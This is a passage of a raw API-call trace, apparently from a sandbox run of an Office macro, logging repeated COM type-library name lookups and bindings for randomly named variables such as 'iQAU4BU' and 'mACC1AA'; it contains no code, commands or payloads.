pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.824] IUnknown:Release (This=0x665ba50) returned 0xd [0069.824] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.824] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="iQAU4BU", lHashVal=0x101900, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.824] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.824] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.824] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="iQAU4BU", lHashVal=0x101900, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.824] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.824] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.824] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="iQAU4BU", lHashVal=0x101900, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.824] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82246, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iQAU4BU") returned 8 [0069.824] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="iQAU4BU", lHashVal=0x101900, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.824] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.824] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b82246 | out: _Dst=0x67c2d40) returned 0x0 [0069.824] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_iQAU4BU") returned 0x100d03 [0069.824] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_iQAU4BU" | out: _Dst="_B_var_iQAU4BU") returned 0x0 [0069.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_iQAU4BU") returned 15 [0069.824] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.824] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_iQAU4BU", lHashVal=0x100d03, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.824] IUnknown:Release (This=0x665ba50) returned 0xd [0069.824] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.824] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_iQAU4BU", lHashVal=0x100d03, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.824] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.824] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.824] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_iQAU4BU", lHashVal=0x100d03, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.824] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.824] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.824] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_iQAU4BU", lHashVal=0x100d03, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.825] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.825] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.825] IUnknown:Release (This=0x665ba50) returned 0xd [0069.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8716ce, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_iQAU4BU") returned 15 [0069.825] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_iQAU4BU", lHashVal=0x100d03, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x34005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x34005500000000, pDummy=0x0) returned 0x0 [0069.825] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b82246 | out: _Dst=0x144ec0) returned 0x0 [0069.825] ITypeComp:RemoteBind (in: This=0x665ba60, szName="fAwwAk4k", lHashVal=0x1080c8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8226e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="fAwwAk4k") returned 9 [0069.825] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="fAwwAk4k", lHashVal=0x1080c8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8226e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="fAwwAk4k") returned 9 [0069.825] ITypeComp:RemoteBind (in: This=0x665bd30, szName="fAwwAk4k", lHashVal=0x1080c8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.825] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fAwwAk4k") returned 0x1080c8 [0069.825] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="fAwwAk4k" | out: _Dst="fAwwAk4k") returned 0x0 [0069.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="fAwwAk4k") returned 9 [0069.825] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.825] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="fAwwAk4k", lHashVal=0x1080c8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.825] IUnknown:Release (This=0x665ba50) returned 0xd [0069.825] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.825] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="fAwwAk4k", lHashVal=0x1080c8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.825] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.825] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.825] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="fAwwAk4k", lHashVal=0x1080c8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.825] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.826] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.826] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="fAwwAk4k", lHashVal=0x1080c8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.826] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8226e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="fAwwAk4k") returned 9 [0069.826] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="fAwwAk4k", lHashVal=0x1080c8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.826] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.826] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b8226e | out: _Dst=0x67c2d40) returned 0x0 [0069.826] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_fAwwAk4k") returned 0x105851 [0069.826] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_fAwwAk4k" | out: _Dst="_B_var_fAwwAk4k") returned 0x0 [0069.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_fAwwAk4k") returned 16 [0069.826] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.826] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_fAwwAk4k", lHashVal=0x105851, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.826] IUnknown:Release (This=0x665ba50) returned 0xd [0069.826] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.826] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_fAwwAk4k", lHashVal=0x105851, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.826] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.826] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.826] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_fAwwAk4k", lHashVal=0x105851, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.826] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.826] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.826] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_fAwwAk4k", lHashVal=0x105851, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.826] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.826] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.826] IUnknown:Release (This=0x665ba50) returned 0xd [0069.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8716fe, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_fAwwAk4k") returned 16 [0069.826] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_fAwwAk4k", lHashVal=0x105851, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x41007700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x41007700000000, pDummy=0x0) returned 0x0 [0069.827] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8226e | out: _Dst=0x144ec0) returned 0x0 [0069.827] ITypeComp:RemoteBind (in: This=0x665ba60, szName="l4D_AU", lHashVal=0x10d8af, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b822c2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="l4D_AU") returned 7 [0069.827] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="l4D_AU", lHashVal=0x10d8af, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b822c2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="l4D_AU") returned 7 [0069.827] ITypeComp:RemoteBind (in: This=0x665bd30, szName="l4D_AU", lHashVal=0x10d8af, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.827] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="l4D_AU") returned 0x10d8af [0069.827] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="l4D_AU" | out: _Dst="l4D_AU") returned 0x0 [0069.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="l4D_AU") returned 7 [0069.827] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.827] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="l4D_AU", lHashVal=0x10d8af, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.827] IUnknown:Release (This=0x665ba50) returned 0xd [0069.827] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.827] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="l4D_AU", lHashVal=0x10d8af, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.827] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.827] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.827] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="l4D_AU", lHashVal=0x10d8af, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.827] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.827] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.827] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="l4D_AU", lHashVal=0x10d8af, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.827] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b822c2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="l4D_AU") returned 7 [0069.828] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="l4D_AU", lHashVal=0x10d8af, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.828] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.828] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b822c2 | out: _Dst=0x67c2d40) returned 0x0 [0069.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_l4D_AU") returned 0x105319 [0069.828] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_l4D_AU" | out: _Dst="_B_var_l4D_AU") returned 0x0 [0069.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_l4D_AU") returned 14 [0069.828] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.828] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_l4D_AU", lHashVal=0x105319, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.828] IUnknown:Release (This=0x665ba50) returned 0xd [0069.828] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.828] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_l4D_AU", lHashVal=0x105319, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.828] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.828] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.828] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_l4D_AU", lHashVal=0x105319, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.828] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.828] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.828] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_l4D_AU", lHashVal=0x105319, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.828] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.828] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.828] IUnknown:Release (This=0x665ba50) returned 0xd [0069.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87172e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_l4D_AU") returned 14 [0069.828] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_l4D_AU", lHashVal=0x105319, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x41005f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x41005f00000000, pDummy=0x0) returned 0x0 [0069.828] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b822c2 | out: _Dst=0x144ec0) returned 0x0 [0069.828] ITypeComp:RemoteBind (in: This=0x665ba60, szName="mACC1AA", lHashVal=0x10daa0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8229a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="mACC1AA") returned 8 [0069.829] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="mACC1AA", lHashVal=0x10daa0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8229a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="mACC1AA") returned 8 [0069.829] ITypeComp:RemoteBind (in: This=0x665bd30, szName="mACC1AA", lHashVal=0x10daa0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mACC1AA") returned 0x10daa0 [0069.829] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="mACC1AA" | out: _Dst="mACC1AA") returned 0x0 [0069.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="mACC1AA") returned 8 [0069.829] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.829] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="mACC1AA", lHashVal=0x10daa0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.829] IUnknown:Release (This=0x665ba50) returned 0xd [0069.829] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.829] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="mACC1AA", lHashVal=0x10daa0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.829] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.829] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.829] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="mACC1AA", lHashVal=0x10daa0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.829] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.829] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.829] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="mACC1AA", lHashVal=0x10daa0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.829] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8229a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="mACC1AA") returned 8 [0069.829] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="mACC1AA", lHashVal=0x10daa0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.830] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.830] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b8229a | out: _Dst=0x67c2d40) returned 0x0 [0069.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_mACC1AA") returned 0x10cea3 [0069.830] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_mACC1AA" | out: _Dst="_B_var_mACC1AA") returned 0x0 [0069.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_mACC1AA") returned 15 [0069.830] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.830] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_mACC1AA", lHashVal=0x10cea3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.830] IUnknown:Release (This=0x665ba50) returned 0xd [0069.830] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.830] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_mACC1AA", lHashVal=0x10cea3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.830] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.830] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.830] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_mACC1AA", lHashVal=0x10cea3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.830] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.830] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.830] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_mACC1AA", lHashVal=0x10cea3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.830] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.830] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.830] IUnknown:Release (This=0x665ba50) returned 0xd [0069.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87175e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_mACC1AA") returned 15 [0069.830] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_mACC1AA", lHashVal=0x10cea3, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x31004300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x31004300000000, pDummy=0x0) returned 0x0 [0069.830] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8229a | out: _Dst=0x144ec0) returned 0x0 [0069.830] ITypeComp:RemoteBind (in: This=0x665ba60, szName="bAZAAw", lHashVal=0x10bb24, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82316, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="bAZAAw") returned 7 [0069.831] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="bAZAAw", lHashVal=0x10bb24, wFlags=0x3, ppTInfo=0x144cf8, 